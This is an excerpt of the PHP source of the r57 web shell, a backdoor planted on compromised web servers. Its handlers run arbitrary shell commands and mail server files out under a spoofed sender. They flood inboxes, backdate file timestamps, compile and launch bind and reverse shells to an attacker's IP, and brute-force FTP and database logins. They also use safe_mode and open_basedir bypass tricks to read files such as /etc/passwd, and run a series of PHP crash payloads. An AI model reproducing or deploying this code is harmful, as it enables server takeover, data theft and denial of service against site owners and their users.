1179 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
1180 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
1181 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
1182 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
1183 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
1184 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
1185 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
1186 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
1187 echo "<br>".ws(2)."</b>";
1188 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
1189 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
1190 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
1191 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
1192 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
1193 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
1194 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
1195 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
1196 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
1197 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
1198 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
1199 } echo '</font></td></tr><table>
1200<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000>
1201<tr><td width=50 style="padding-left:10px"><img src="http://resimyukle.me/server/php/files/76b1a46b883b02d8861e19e68c0b1dd3/computer.png"></td><td align=right width=48>';
1202 echo $font;
1203 if($unix){ echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1204 echo "</td><td>";
1205 echo "<font face=Verdana size=-2 color=red><b>";
1206 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1207 echo ws(3).$sysctl."<br>";
1208 echo ws(3).ex('echo $OSTYPE')."<br>";
1209 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1210 if(!empty($id)) {echo ws(3).$id."<br>";
1211} else if(@function_exists('posix_geteuid') &&@function_exists('posix_getegid') &&@function_exists('posix_getgrgid') &&@function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid());
1212 $egroupinfo = @posix_getgrgid(@posix_getegid());
1213 echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1214 } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1215 echo ws(3).$dir;
1216 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1217 echo "</b></font>";
1218 } else { echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1219 echo "</td><td>";
1220 echo "<font face=Verdana size=-2 color=red><b>";
1221 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1222 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1223 echo ws(3).@getenv("USERNAME")."<br>";
1224 echo ws(3).$dir;
1225 echo "<br></font>";
1226 } echo "</font>";
1227 echo "</td></tr></table>";
1228 if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail") { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1229 err(6+$res);
1230 $_POST['cmd']="";
1231 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_file"&&!empty($_POST['loc_file'])) { if($file=@fopen($_POST['loc_file'],"r")){$filedump = @fread($file,@filesize($_POST['loc_file']));
1232@fclose($file);
1233} else if ($file=readzlib($_POST['loc_file'])) {$filedump = $file;
1234}else {err(1,$_POST['loc_file']);
1235$_POST['cmd']="";
1236} if(isset($_POST['cmd'])) { $filename = @basename($_POST['loc_file']);
1237 $content_encoding=$mime_type='';
1238 compress($filename,$filedump,$_POST['compress']);
1239 $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump );
1240 if(empty($_POST['subj'])) {$_POST['subj'] = 'file from r57';
1241} if(empty($_POST['from'])) {$_POST['from'] = 'billy@microsoft.com';
1242} $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1243 err(6+$res);
1244 $_POST['cmd']="";
1245 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mail_bomber"&&!empty($_POST['mail_flood']) &&!empty($_POST['mail_size'])) { for($h=1;
1246$h<=$_POST['mail_flood'];
1247$h++){ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ",1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
1248 } err(6+$res);
1249 $_POST['cmd']="";
1250 } if(!empty($_POST['cmd']) &&$_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1251 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="ch_") { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']);
1252 break;
1253 case 'grp': @chgrp($_POST['param1'],$_POST['param2']);
1254 break;
1255 case 'mod': @chmod($_POST['param1'],intval($_POST['param2'],8));
1256 break;
1257 } $_POST['cmd']="";
1258 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="mk") { switch($_POST['what']) { case 'file': if($_POST['action'] == "create") { if(@file_exists($_POST['mk_name']) ||!$file=@fopen($_POST['mk_name'],"w")) {err(2,$_POST['mk_name']);
1259$_POST['cmd']="";
1260} else { @fclose($file);
1261 $_POST['e_name'] = $_POST['mk_name'];
1262 $_POST['cmd']="edit_file";
1263 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1264 } } else if($_POST['action'] == "delete") { if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1265 $_POST['cmd']="";
1266 } break;
1267 case 'dir': if($_POST['action'] == "create"){ if(@mkdir($_POST['mk_name'])) { $_POST['cmd']="";
1268 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1269 } else {err(2,$_POST['mk_name']);
1270$_POST['cmd']="";
1271} } else if($_POST['action'] == "delete"){ if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1272 $_POST['cmd']="";
1273 } break;
1274 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="touch") { if(!$_POST['file_name_r']) { $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
1275 $datar = @strtotime($datar);
1276 @touch($_POST['file_name'],$datar,$datar);
1277} else{ @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
1278 } $_POST['cmd']="";
1279 } if(!empty($_POST['cmd']) &&$_POST['cmd']=="edit_file"&&!empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],"r+")) {$filedump = @fread($file,@filesize($_POST['e_name']));
1280@fclose($file);
1281$only_read = 1;
1282} if($file=@fopen($_POST['e_name'],"r")) {$filedump = @fread($file,@filesize($_POST['e_name']));
1283@fclose($file);
1284} else if ($file=readzlib($_POST['e_name'])) {$filedump = $file;
1285$only_read = 1;
1286}else {err(1,$_POST['e_name']);
1287$_POST['cmd']="";
1288} if(isset($_POST['cmd'])) { echo $table_up3;
1289 echo $font;
1290 echo "<form name=save_file method=post>";
1291 echo ws(3)."<b>".$_POST['e_name']."</b>";
1292 echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1293 echo @htmlspecialchars($filedump);
1294 echo "</textarea>";
1295 echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1296 echo "<input type=hidden name=dir value=".$dir.">";
1297 echo "<input type=hidden name=cmd value=save_file>";
1298 echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1299 echo "</div>";
1300 echo "</font>";
1301 echo "</form>";
1302 echo "</td></tr></table>";
1303 exit();
1304 } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="save_file") { $mtime = @filemtime($_POST['e_name']);
1305 if((!$file=@fopen($_POST['e_name'],"w")) &&(!function_exists('file_put_contents'))) {err(0,$_POST['e_name']);
1306} else { if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1307 @fwrite($file,$_POST['e_text']) or @fputs($file,$_POST['e_text']) or @file_put_contents($_POST['e_name'],$_POST['e_text']);
1308 @touch($_POST['e_name'],$mtime,$mtime);
1309 $_POST['cmd']="";
1310 echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1311 } } if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) { cf("/tmp/prxpl",$prx_pl);
1312 $p2=which("perl");
1313 $blah = ex($p2." /tmp/prxpl ".$_POST['proxy_port']." &");
1314 $_POST['cmd']="ps -aux | grep prxpl";
1315 } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) { cf("/tmp/bd.c",$port_bind_bd_c);
1316 $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1317 @unlink("/tmp/bd.c");
1318 $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
1319 $_POST['cmd']="ps -aux | grep bd";
1320 } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl);
1321 $p2=which("perl");
1322 $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1323 $_POST['cmd']="ps -aux | grep bdpl";
1324 } if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="Perl")) { cf("/tmp/back",$back_connect);
1325 $p2=which("perl");
1326 $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1327 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1328 } if (!empty($_POST['ip']) &&!empty($_POST['port']) &&($_POST['use']=="C")) { cf("/tmp/back.c",$back_connect_c);
1329 $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1330 @unlink("/tmp/back.c");
1331 $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1332 $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1333 } if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="Perl")) { cf("/tmp/dp",$datapipe_pl);
1334 $p2=which("perl");
1335 $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1336 $_POST['cmd']="ps -aux | grep dp";
1337 } if (!empty($_POST['local_port']) &&!empty($_POST['remote_host']) &&!empty($_POST['remote_port']) &&($_POST['use']=="C")) { cf("/tmp/dpc.c",$datapipe_c);
1338 $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1339 @unlink("/tmp/dpc.c");
1340 $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1341 $_POST['cmd']="ps -aux | grep dpc";
1342 } if (!empty($_POST['alias']) &&isset($aliases[$_POST['alias']])) {$_POST['cmd'] = $aliases[$_POST['alias']];
1343} for($upl=0;
1344$upl<=16;
1345$upl++) { if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ if(!empty($_POST['new_name']) &&($upl==0)) {$nfn = $_POST['new_name'];
1346} else {$nfn = $HTTP_POST_FILES['userfile'.$upl]['name'];
1347} @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
1348 } } if (!empty($_POST['with']) &&!empty($_POST['rem_file']) &&!empty($_POST['loc_file'])) { switch($_POST['with']) { case 'fopen': $datafile = @implode("",@file($_POST['rem_file']));
1349 if($datafile) { $w_file=@fopen($_POST['loc_file'],"wb") or @function_exists('file_put_contents') or err(0);
1350 if($w_file) { @fwrite($w_file,$datafile) or @fputs($w_file,$datafile) or @file_put_contents($_POST['loc_file'],$datafile);
1351 @fclose($w_file);
1352 } } $_POST['cmd'] = '';
1353 break;
1354 case 'wget': $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1355 break;
1356 case 'fetch': $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1357 break;
1358 case 'lynx': $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1359 break;
1360 case 'links': $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1361 break;
1362 case 'GET': $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1363 break;
1364 case 'curl': $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1365 break;
1366 } } if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_file_up") ||($_POST['cmd']=="ftp_file_down"))) { list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1367 if(empty($ftp_port)) {$ftp_port = 21;
1368} $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1369 if(!$connection) {err(3);
1370} else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) {err(4);
1371} else { if($_POST['cmd']=="ftp_file_down") {if(chop($_POST['loc_file'])==$dir) {$_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']);
1372}@ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);
1373} if($_POST['cmd']=="ftp_file_up") {@ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);
1374} } } @ftp_close($connection);
1375 $_POST['cmd'] = "";
1376 } if(!empty($_POST['cmd']) &&(($_POST['cmd']=="ftp_brute") ||($_POST['cmd']=="db_brute"))) { if($_POST['cmd']=="ftp_brute"){ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1377 if(empty($ftp_port)) {$ftp_port = 21;
1378} $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1379 }else if($_POST['cmd']=="db_brute"){ $connection = 1;
1380 } if(!$connection) {err(3);
1381$_POST['cmd'] = "";
1382} else if(($_POST['brute_method']=='passwd') &&(!$users=get_users('/etc/passwd'))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>";
1383$_POST['cmd'] = "";
1384} else if(($_POST['brute_method']=='dic') &&(!$users=get_users($_POST['dictionary']))){echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#008000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>";
1385$_POST['cmd'] = "";
1386} if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);
1387} } echo $table_up3;
1388 if (empty($_POST['cmd']) &&!$safe_mode &&!$open_basedir) {$_POST['cmd']=(!$unix)?("dir"):("ls -lia");
1389} else if(empty($_POST['cmd']) &&($safe_mode ||$open_basedir)){$_POST['cmd']="safe_dir";
1390} echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
1391 if($safe_mode ||$open_basedir) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir);
1392 if ($d) { while (false!==($file=$d->read())) { if ($file=="."||$file=="..") continue;
1393 @clearstatcache();
1394 @list ($dev,$inode,$inodep,$nlink,$uid,$gid,$inodev,$size,$atime,$mtime,$ctime,$bsize) = stat($file);
1395 if(!$unix){ echo date("d.m.Y H:i",$mtime);
1396 if(@is_dir($file)) echo " <DIR> ";
1397else printf("% 7s ",$size);
1398 } else{ if(@function_exists('posix_getpwuid')){ $owner = @posix_getpwuid($uid);
1399 $grgid = @posix_getgrgid($gid);
1400 }else{$owner['name']=$grgid['name']='';
1401} echo $inode." ";
1402 echo perms(@fileperms($file));
1403 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
1404 echo date("d.m.Y H:i ",$mtime);
1405 } echo "$file\n";
1406 } $d->close();
1407 } else if(@function_exists('glob')) { function eh($errno,$errstr,$errfile,$errline) { global $D,$c,$i;
1408 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/",$errstr,$o);
1409 if($o){$D[$c] = $o[2];
1410$c++;
1411} } $error_reporting = @ini_get('error_reporting');
1412 error_reporting(E_WARNING);
1413 @ini_set("display_errors",1);
1414 $root = "/";
1415 if($dir) $root = $dir;
1416 $c = 0;
1417$D = array();
1418 @set_error_handler("eh");
1419 $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
1420 for($i=0;
1421$i <strlen($chars);
1422$i++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}";
1423 $prevD = $D[count($D)-1];
1424 @glob($path."*");
1425 if($D[count($D)-1] != $prevD) { for($j=0;
1426$j <strlen($chars);
1427$j++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}";
1428 $prevD2 = $D[count($D)-1];
1429 @glob($path."*");
1430 if($D[count($D)-1] != $prevD2) { for($p=0;
1431$p <strlen($chars);
1432$p++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
1433 $prevD3 = $D[count($D)-1];
1434 @glob($path."*");
1435 if($D[count($D)-1] != $prevD3) { for($r=0;
1436$r <strlen($chars);
1437$r++) { $path ="{$root}".((substr($root,-1)!="/") ?"/": NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
1438 @glob($path."*");
1439 } } } } } } } $D = array_unique($D);
1440 foreach($D as $item) echo htmlspecialchars("{$item}")."\r\n";
1441 error_reporting($error_reporting);
1442 } else echo $lang[$language.'_text29'];
1443 break;
1444 case 'test1': $ci = @curl_init("file://".$_POST['test1_file']);
1445 $cf = @curl_exec($ci);
1446 echo htmlspecialchars($cf);
1447 break;
1448 case 'test2': @include($_POST['test2_file']);
1449 break;
1450 case 'test3': if(empty($_POST['test3_port'])) {$_POST['test3_port'] = "3306";
1451} $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
1452 if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1453 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
1454 @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
1455 $r = @mysql_query("SELECT * FROM temp_r57_table");
1456 while(($r_sql = @mysql_fetch_array($r))) {echo @htmlspecialchars($r_sql[0])."\r\n";
1457} @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
1458 } else echo "[-] ERROR! Can't select database";
1459 @mysql_close($db);
1460 } else echo "[-] ERROR! Can't connect to mysql server";
1461 break;
1462 case 'test4': if(empty($_POST['test4_port'])) {$_POST['test4_port'] = "1433";
1463} $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
1464 if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db);
1465 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
1466 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
1467 $res = mssql_query("select * from r57_temp_table",$db);
1468 while(($row=@mssql_fetch_row($res))) { echo htmlspecialchars($row[0])."\r\n";
1469 } @mssql_query("drop table r57_temp_table",$db);
1470 } else echo "[-] ERROR! Can't select database";
1471 @mssql_close($db);
1472 } else echo "[-] ERROR! Can't connect to MSSQL server";
1473 break;
1474 case 'test5': $temp=tempnam($dir,"fname");
1475 if (@file_exists($temp)) @unlink($temp);
1476 $extra = "-C ".$_POST['test5_file']." -X $temp";
1477 @mb_send_mail(NULL,NULL,NULL,NULL,$extra);
1478 $str = moreread($temp);
1479 echo htmlspecialchars($str);
1480 @unlink($temp);
1481 break;
1482 case 'test6': $stream = @imap_open('/etc/passwd',"","");
1483 $dir_list = @imap_list($stream,trim($_POST['test6_file']),"*");
1484 for ($i = 0;
1485$i <count($dir_list);
1486$i++) echo htmlspecialchars($dir_list[$i])."\r\n";
1487 @imap_close($stream);
1488 break;
1489 case 'test7': $stream = @imap_open($_POST['test7_file'],"","");
1490 $str = @imap_body($stream,1);
1491 echo htmlspecialchars($str);
1492 @imap_close($stream);
1493 break;
1494 case 'test8': $temp=@tempnam($_POST['test8_file2'],"copytemp");
1495 $str = readzlib($_POST['test8_file1'],$temp);
1496 echo htmlspecialchars($str);
1497 @unlink($temp);
1498 break;
1499 case 'test9': @ini_restore("safe_mode");
1500 @ini_restore("open_basedir");
1501 $str = moreread($_POST['test9_file']);
1502 echo htmlspecialchars($str);
1503 break;
1504 case 'test10': @ob_clean();
1505 $error_reporting = @ini_get('error_reporting');
1506 error_reporting(E_ALL ^E_NOTICE);
1507 @ini_set("display_errors",1);
1508 $str=fopen($_POST['test10_file'],"r");
1509 while(!feof($str)){print htmlspecialchars(fgets($str));
1510} fclose($str);
1511 error_reporting($error_reporting);
1512 break;
1513 case 'test11': @ob_clean();
1514 $temp = 'zip://'.$_POST['test11_file'];
1515 $str = moreread($temp);
1516 echo htmlspecialchars($str);
1517 break;
1518 case 'test12': @ob_clean();
1519 $temp = 'compress.bzip2://'.$_POST['test12_file'];
1520 $str = moreread($temp);
1521 echo htmlspecialchars($str);
1522 break;
1523 case 'test13': @error_log($_POST['test13_file1'],3,"php://../../../../../../../../../../../".$_POST['test13_file2']);
1524 echo $lang[$language.'_text61'];
1525 break;
1526 case 'test14': @session_save_path($_POST['test14_file2']."\0;
1527/tmp");
1528 @session_start();
1529 @$_SESSION[php]=$_POST['test14_file1'];
1530 echo $lang[$language.'_text61'];
1531 break;
1532 case 'test15': @readfile($_POST['test15_file1'],3,"php://../../../../../../../../../../../".$_POST['test15_file2']);
1533 echo $lang[$language.'_text61'];
1534 break;
1535 case 'test16': if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
1536 break;
1537 case 'test17_1': @unlink('symlinkread');
1538 @symlink('a/a/a/a/a/a/','dummy');
1539 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'],'symlinkread');
1540 @unlink('dummy');
1541 while (1) { @symlink('.','dummy');
1542 @unlink('dummy');
1543 } break;
1544 case 'test17_2': $str='';
1545 while (strlen($str) <3) { $temp = 'symlinkread';
1546 $str = moreread($temp);
1547 if($str){@ob_clean();
1548echo htmlspecialchars($str);
1549} } break;
1550 case 'test17_3': $dir = $files = array();
1551 if(@version_compare(@phpversion(),"5.0.0")>=0){ while (@count($dir) <3) { $dir=@scandir('symlinkread');
1552 if (@count($dir) >2) {@ob_clean();
1553@print_r($dir);
1554} } } else { while (@count($files) <3) { $dh = @opendir('symlinkread');
1555 while (false !== ($filename = @readdir($dh))) { $files[] = $filename;
1556 } if(@count($files) >2){@ob_clean();
1557@print_r($files);
1558} } } break;
1559 } } if((!$safe_mode) &&($_POST['cmd']!="php_eval") &&($_POST['cmd']!="mysql_dump") &&($_POST['cmd']!="db_query") &&($_POST['cmd']!="ftp_brute") &&($_POST['cmd']!="db_brute")){ $cmd_rep = ex($_POST['cmd']);
1560 if(!$unix) {echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n";
1561} else {echo @htmlspecialchars($cmd_rep)."\n";
1562}} switch($_POST['cmd']) { case 'dos1': function a() {a();
1563}a();
1564 break;
1565 case 'dos2': @pack("d4294967297",2);
1566 break;
1567 case 'dos3': $a = "a";
1568@unserialize(@str_replace('1',2147483647,@serialize($a)));
1569 break;
1570 case 'dos4': $t = array(1);
1571while (1) {$a[] = &$t;
1572};
1573 break;
1574 case 'dos5': @dl("sqlite.so");
1575$db = new SqliteDatabase("foo");
1576 break;
1577 case 'dos6': preg_match('/(.(?!b))*/',@str_repeat("a",10000));
1578 break;
1579 case 'dos7': @str_replace("A",str_repeat("B",65535),str_repeat("A",65538));
1580 break;
1581 case 'dos8': @shell_exec("killall -11 httpd");
1582 break;
1583 case 'dos9': function cx(){@tempnam("/www/","../../../../../../var/tmp/cx");
1584cx();
1585}cx();
1586 break;
1587 case 'dos10': $a = @str_repeat ("A",438013);
1588$b = @str_repeat ("B",951140);
1589@wordwrap ($a,0,$b,0);
1590 break;
1591 case 'dos11': @array_fill(1,123456789,"Infigo-IS");
1592 break;
1593 case 'dos12': @substr_compare("A","A",12345678);
1594 break;
1595 case 'dos13': @unserialize("a:2147483649:{");
1596 break;
1597 case 'dos14': $Data = @str_ireplace("\n","<br>",$Data);
1598 break;
1599 case 'dos15': function toUTF($x) {return chr(($x >>6) +192) .chr(($x &63) +128);
1600} $str1 = "";
1601for($i=0;
1602$i <64;
1603$i++){$str1 .= toUTF(977);
1604} @htmlentities($str1,ENT_NOQUOTES,"UTF-8");
1605 break;
1606 case 'dos16': $r = @zip_open("x.zip");
1607$e = @zip_read($r);
1608$x = @zip_entry_open($r,$e);
1609 for ($i=0;
1610$i<1000;
1611$i++) $arr[$i]=array(array(""));
1612 unset($arr[600]);
1613@zip_entry_read($e,-1);
1614unset($arr[601]);
1615 break;
1616 case 'dos17': $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
1617 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
1618 $x = "AQ ";
1619 unset($z);
1620unset($y);
1621$x = base64_decode($x);
1622$y = @sqlite_udf_decode_binary($x);
1623unset($x);
1624 break;
1625 case 'dos18': $MSGKEY = 519052;
1626$msg_id = @msg_get_queue ($MSGKEY,0600);
1627 if (!@msg_send ($msg_id,1,'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH',false,true,$msg_err)) echo "Msg not sent because $msg_err\n";
1628 if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)) { echo "$msg\n";
1629 }else {echo "Received $msg_error fetching message\n";
1630break;
1631} @msg_remove_queue ($msg_id);
1632 break;
1633 case 'dos19': $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";
1634@fopen($url,"r");
1635 break;
1636 case 'dos20': $hashtable = str_repeat("A",39);
1637 $hashtable[5*4+0]=chr(0x58);
1638$hashtable[5*4+1]=chr(0x40);
1639$hashtable[5*4+2]=chr(0x06);
1640$hashtable[5*4+3]=chr(0x08);
1641 $hashtable[8*4+0]=chr(0x66);
1642$hashtable[8*4+1]=chr(0x77);
1643$hashtable[8*4+2]=chr(0x88);
1644$hashtable[8*4+3]=chr(0x99);
